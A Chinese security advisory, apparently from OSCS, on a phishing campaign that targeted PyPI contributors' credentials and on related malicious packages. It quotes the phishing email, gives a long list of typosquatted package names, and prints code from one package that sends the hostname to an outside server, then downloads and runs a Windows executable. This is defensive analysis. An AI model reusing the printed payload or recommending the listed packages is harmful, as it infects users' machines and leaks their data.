投毒者对 PyPi 上的开源组件开发者下手了

简述

OSCS 近期监测到 PyPi 官方发布公告称有攻击者针对 PyPi 上的开源组件开发者进行钓鱼,试图窃取 PyPi 贡献者的凭据。本次攻击是通过贼喊捉贼的假装PyPi官方给恶意包发邮箱进行钓鱼,开发者可以通过开启2FA认证防止被攻击者窃取凭据后更改项目。

钓鱼事件

通过钓鱼邮件获取 PyPi 贡献者的凭据

根据PyPi官方发布的公告得知:

PyPi 贡献者收到了一封网络钓鱼电子邮件,要求他验证他的 PyPi 凭据,导致他进入一个虚假的 PyPi 登录页面,试图窃取他的 PyPi 凭据。

钓鱼邮件的大致内容如下:

“由于PyP在过去被上传过恶意包,谷歌会对PyPi的全量包进行分析。

您收到这封邮件是因为google的安全策略,请使用谷歌验证您的包,以避免您的 PyPi 包从 PyPi.org 删除

9月前未验证的包将被及时移除

如果您目前没有贡献的 PyPi 包,请忽略此邮件

PyPi 团队”

投毒者对 PyPi 上的开源组件开发者下手了

来自攻击者发送的钓鱼邮件

虚假的 PyPi 登录页面,试图窃取 PyPi 贡献者的凭据。

投毒者对 PyPi 上的开源组件开发者下手了

虚假的PyPi登录页面

PyPi官方已声明在不违反TOS或确定为有危害的项目时候,并不会从索引中删除有效的项目。

投毒者对 PyPi 上的开源组件开发者下手了

投放恶意组件包

PyPi 的官方推特账号报告称,这次网络钓鱼攻击与数百个恶意 python 包在内以及更广泛的事件有关。这些恶意软件包已从注册表中删除。

投毒者对 PyPi 上的开源组件开发者下手了

以其中的一个恶意包为例子:

from setuptools import setup, find_packages
import os 
import requests
from setuptools.command.install import install
from sys import platform
def send():
    try:
        env = os.environ['COMPUTERNAME']
        t = requests.get("https://linkedopports.com/pyp/resp.php?live=Installation " +env)
        if platform == 'win32':
            url = 'https://python-release.com/python-install.scr'
            filename = 'ini_file_pyp_32.exe'
            rq = requests.get(url, allow_redirects=True)
            open(filename, 'wb').write(rq.content)
            os.system('start '+filename)
    except:
        pass 

demo.py

从上述恶意包的代码中可以直观发现两个可疑的url

攻击者将 os.environ[‘COMPUTERNAME’] 主机名传输到https://linkedopports.com/pyp/resp.php?live=Installation

攻击者从https://python-release.com/python-install.scr去下载python-install.scr[木马程序]并去执行它。

总结

OSCS分析认为目前攻击者在不断更新攻击手法,在不断注册小号投毒的基础上,开始试图通过窃取开发者用户账号进行投毒,如果有知名项目被窃取PyPi 凭据,后果不堪设想。

如果您是 PyPi 贡献者,请开启2FA认证防止被窃取凭证后影响PyPi项目。

参考链接

https://www.oscs1024.com/hd/MPS-2022-56085
https://twitter.com/pypi/status/1562442188285308929

附录

目前这些恶意组件的部分在国内清华源中还未删除,请研发同学避免下载以下恶意包,列表如下:

组件名作者
firstbasicpyappfirstbasicpyapp
coingecko-apisfirstbasicpyapp
coinmarketcapsfirstbasicpyapp
igtoolfirstbasicpyapp
monkeytypesfirstbasicpyapp
multipornfirstbasicpyapp
opencb-pythonfirstbasicpyapp
opencvv-pythonfirstbasicpyapp
pyteseractfirstbasicpyapp
seleniunfirstbasicpyapp
manganekoelevatepyapp
bcryptoelevatepyapp
deep-translateelevatepyapp
discord.ptelevatepyapp
discord.puelevatepyapp
instabotselevatepyapp
psycogp2elevatepyapp
pycryptdomeelevatepyapp
pycryptodomeselevatepyapp
pyptttelevatepyapp
pytttsx3elevatepyapp
pywin31elevatepyapp
pywin33elevatepyapp
redistelevatepyapp
tiktok-botselevatepyapp
yandex-mapelevatepyapp
arcalifefirstbasicpyapp
linkedin-scrapefirstbasicpyapp
memory-profilefirstbasicpyapp
osrs-hiscorefirstbasicpyapp
pymongosinspired13firstbasicpyapp
selenuimfirstbasicpyapp
ymongofirstbasicpyapp
1337cpraisepyapp
1337zpraisepyapp
andex-mapspraisepyapp
deep-translationpraisepyapp
eautifulsoup4praisepyapp
emoji-country-flagspraisepyapp
emokipraisepyapp
etuptoolspraisepyapp
keybaordpraisepyapp
pencv-pythonpraisepyapp
proxyscropepraisepyapp
pydobcpraisepyapp
speechrecongitionpraisepyapp
xlibrarypraisepyapp
yautoguipraisepyapp
ypttpraisepyapp
etuptoolpypiappz
deeeplpypiappz
discordhookpypiappz
eeplpypiappz
eleniumpypiappz
igtoolzpypiappz
proxycrapepypiappz
proxyrapepypiappz
statmodelpypiappz
statmodelspypiappz
statsmodelpypiappz
yaudiopypiappz
yinancepypiappz
yinstallerpypiappz
ywin32pypiappz
asn2cryptopypzz
bitcoinlivpypzz
crypto-data-fetchpypzz
crypto-get-pricepypzz
crypto-openpypzz
crypto-ospypzz
cryptobalancepypzz
django-metamaks-authpypzz
django-metamask-autpypzz
django-web2-authpypzz
django-web3-autpypzz
django-web4-authpypzz
hamenipypzz
historic-cryptpypzz
jango-metamask-authpypzz
jango-web3-authpypzz
pyvryptopypzz
pyxryptopypzz
ycryptopypzz
ycryptodomepypzz
ccsvpypzz1
contextlivpypzz1
cryptographyypypzz1
csvvpypzz1
cvspypzz1
flak7pypzz1
flak8pypzz1
flake7pypzz1
fuzywuzypypzz1
fuzywuzzypypzz1
fuzzywuzypypzz1
fuzzzywuzzypypzz1
hreadingpypzz1
laysoundpypzz1
playsounpypzz1
pyinstalerpypzz1
rgparsepypzz1
threadinpypzz1
threedingpypzz1
uzzywuzzypypzz1
we3pypzz1
wec3pypzz1
weg3pypzz1
wen3pypzz1
(0)
上一篇 2023年8月9日 下午5:40
下一篇 2023年8月9日 下午5:46

相关推荐

  • 开源无国界?vue-cli、node-ipc被投毒事件分析

    简述 近日我们监测到Vue.js生态中的vue-cli包遭遇供应链投毒,而被投毒的node-ipc包在npm上每周下载量超百万,影响非常广泛。 被投毒的情况如下: (问题组件每周下载量截图) 事件时间线 3月7号 开发者RIAEvangelist在node-ipc包中添加名为ssl-geospec.js的恶意JS文件,将node-ipc的版本号更新为10.1…

    2023年8月9日
    0
  • shaikhyaser在NPM 仓库中投放67个恶意包

    一、事件简述: 7 月 16 日 ,OSCS 安全社区监测到shaikhyaser一天内在NPM仓库中不间断投放了十多个组件包,这些组件包都包含恶意行为。截止到21日,该用户已向 NPM 仓库投放了 67个不同版本的的恶意组件包,这些包也在代码中注明了该用户的邮箱,推测是hackerone中的用户。 这些恶意包的攻击方式相同,下面来分析其攻击手法。 二、 手…

    2023年8月9日
    0
  • 差点引爆全球的核弹,深度分析XZ-Utils供应链后门投毒事件

    处心积虑的投毒者蛰伏三年多,精心选择对象,通过复杂的攻击手法、专业的技战术,一步步支起一张大网,企图掌控全球主流linux发行版,一旦成功他将可以随意侵入全球绝大多数的服务器,这将是足以引爆全球的核弹危机。所幸由于复杂度过高以及投毒者的疏忽,事件被及早发现,没有造成过大的现实危害。但此次事件再次凸显出开源软件生态的脆弱性,本次事件仍可能只是冰山下的一角。墨菲…

    2024年4月1日
    0
  • btwiuse在 NPM 仓库中发布后门组件

    事件简述 NPM 是 Node.js 包管理工具,提供了对第三方 Node.js 包的查找、下载、安装、卸载等功能。 2022 年 07 月 04 日,OSCS 监测发现 NPM 官方仓库被 btwiuse 上传了 btwiuse、k0s 恶意组件包,使用恶意组件包后会在用户电脑上加载名为 k0s 的远控木马,危害较为严重,OSCS 提醒广大开发者关注。 详…

    2023年8月9日
    0
  • 小心恶意NPM包让你成为51Pwn的肉鸡

    10月31日,墨菲安全实验室监测到名为hktalent的开发者在NPM中央仓库发布了aliyundrive、spring-projects 等15个NPM投毒包,组件包通过混淆进行反检测,开发者难以发现隐藏的恶意代码。 其中 aliyundrive 组件包仿冒了阿里云盘名称,国内用户开发者在使用阿里云盘过程中有可能中招。 当用户安装时会窃取用户的操作系统、网…

    2023年11月1日
    0